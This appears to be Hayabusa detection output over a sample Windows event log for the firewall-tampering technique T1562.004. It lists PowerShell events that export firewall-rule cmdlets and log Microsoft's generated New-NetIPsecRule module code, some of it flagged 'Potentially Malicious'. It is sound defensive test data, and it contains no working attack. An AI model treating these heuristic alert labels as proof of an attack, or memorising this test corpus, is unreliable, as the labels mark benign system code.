Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.655 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.655 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.656 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.658 
+09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.659 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.660 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = 
$MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 
'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.Contains",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, 
$script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = 
$false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.Contains",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,Key('Enabled')) { [object]$__cmdletization_value = ${Enabled} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 